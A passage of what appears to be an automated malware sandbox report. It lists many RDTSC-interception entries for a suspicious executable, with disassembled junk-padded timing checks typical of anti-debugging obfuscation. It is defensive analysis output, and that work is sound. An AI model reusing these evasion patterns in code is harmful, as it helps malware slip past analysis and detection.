0x00000052 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E263DE second address: E263E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E263E4 second address: E26402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8C24FD04D0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ecx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E4607B second address: E460AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8C2504F38Dh 0x0000000f jmp 00007F8C2504F399h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E460AC second address: E460C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C24FD04D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E460C9 second address: E460CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E460CF second address: E460DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E460DC second address: E460E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E460E0 second address: E460F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E46370 second address: E4637F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jnp 00007F8C2504F386h 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E4650E second address: E46518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E46A39 second address: E46A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E46A3D second address: E46A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D1h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c js 00007F8C24FD04C6h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E46A5C second address: E46A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C2504F397h 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E46A8B second address: E46A9F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F8C24FD04C6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E46BD9 second address: E46BDE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E46E88 second address: E46E94 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C24FD04C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E47011 second address: E47016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E47016 second address: E47020 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C24FD04CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E3C205 second address: E3C209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E3C209 second address: E3C276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8C24FD04D5h 0x0000000e jmp 00007F8C24FD04CEh 0x00000013 popad 0x00000014 jmp 00007F8C24FD04D0h 0x00000019 jmp 00007F8C24FD04D5h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8C24FD04D8h 0x00000026 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E478AE second address: E478CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F8C2504F386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F8C2504F388h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E478CB second address: E478DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8C24FD04C6h 0x0000000a jnp 00007F8C24FD04C6h 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E1B495 second address: E1B49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E52F94 second address: E52FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C24FD04D8h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5310E second address: E5311F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jng 00007F8C2504F386h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E54022 second address: E54026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5460A second address: E54610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E54E19 second address: E54E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E54E1F second address: E54E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E54E24 second address: E54E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C24FD04D6h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E550E6 second address: E55101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C2504F391h 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E55101 second address: E55105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E551CD second address: E551DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F8C2504F386h 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E551DD second address: E551EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F8C24FD04C6h 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E552A2 second address: E552AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C2504F386h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E552AD second address: E552C4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C24FD04C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F8C24FD04C8h 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E552C4 second address: E552D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C2504F38Ch 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E557B4 second address: E557C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E59FC4 second address: E5A06C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F8C2504F390h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F8C2504F388h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F8C2504F388h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 mov edi, 04EF873Ch 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f push esi 0x00000050 call 00007F8C2504F38Ch 0x00000055 pop edi 0x00000056 pop esi 0x00000057 pop esi 0x00000058 or dword ptr [ebp+122D1A1Ah], edx 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F8C2504F397h 0x00000067 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5B6EE second address: E5B6F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5C135 second address: E5C139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5C139 second address: E5C159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F8C24FD04D2h 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5C159 second address: E5C15E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E56AA0 second address: E56AA6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E56AA6 second address: E56AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E56AAB second address: E56AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E66CBD second address: E66CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E67B8D second address: E67B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E67B91 second address: E67B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E67B97 second address: E67C09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov bx, 136Dh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F8C24FD04C8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov ebx, 779BDF11h 0x00000031 mov dword ptr [ebp+12478474h], edx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007F8C24FD04C8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jp 00007F8C24FD04C6h 0x0000005e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E67C09 second address: E67C0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E67C0F second address: E67C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E67C15 second address: E67C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E67C19 second address: E67C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E68B7D second address: E68B83 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E68B83 second address: E68B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F8C24FD04C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E69BBA second address: E69BE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C2504F395h 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6BAF7 second address: E6BB60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a xor dword ptr [ebp+122D2A3Dh], ecx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F8C24FD04C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c cld 0x0000002d sub edi, dword ptr [ebp+122D3A7Ah] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F8C24FD04C8h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f mov dword ptr [ebp+122D2160h], esi 0x00000055 push eax 0x00000056 jo 00007F8C24FD04EBh 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6BB60 second address: E6BB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CBDD second address: E6CBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CBE1 second address: E6CBFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F398h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6F141 second address: E6F145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6F145 second address: E6F153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6F153 second address: E6F15D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C24FD04CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E701BA second address: E701CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 jng 00007F8C2504F394h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E711B2 second address: E711BC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C24FD04CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E7226C second address: E72270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E72270 second address: E7227A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E733DF second address: E7341C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov di, B3CAh 0x00000011 push 00000000h 0x00000013 mov ebx, edi 0x00000015 add dword ptr [ebp+122D326Ch], edi 0x0000001b push 00000000h 0x0000001d xor di, A7AFh 0x00000022 xchg eax, esi 0x00000023 push ecx 0x00000024 jmp 00007F8C2504F38Bh 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jo 00007F8C2504F386h 0x00000034 push edx 0x00000035 pop edx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E742D7 second address: E742DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E742DB second address: E742E9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C2504F386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E742E9 second address: E742ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E7C8E2 second address: E7C8EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C2504F386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E7C8EC second address: E7C8F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E7CB77 second address: E7CBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8C2504F386h 0x0000000a popad 0x0000000b pushad 0x0000000c js 00007F8C2504F386h 0x00000012 jmp 00007F8C2504F38Ch 0x00000017 jmp 00007F8C2504F397h 0x0000001c jmp 00007F8C2504F390h 0x00000021 popad 0x00000022 popad 0x00000023 jp 00007F8C2504F3C0h 0x00000029 jnp 00007F8C2504F395h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F8C2504F391h 0x00000036 jnp 00007F8C2504F386h 0x0000003c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E7CD54 second address: E7CD60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E7CD60 second address: E7CD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E7CD66 second address: E7CD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E7CD6A second address: E7CD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
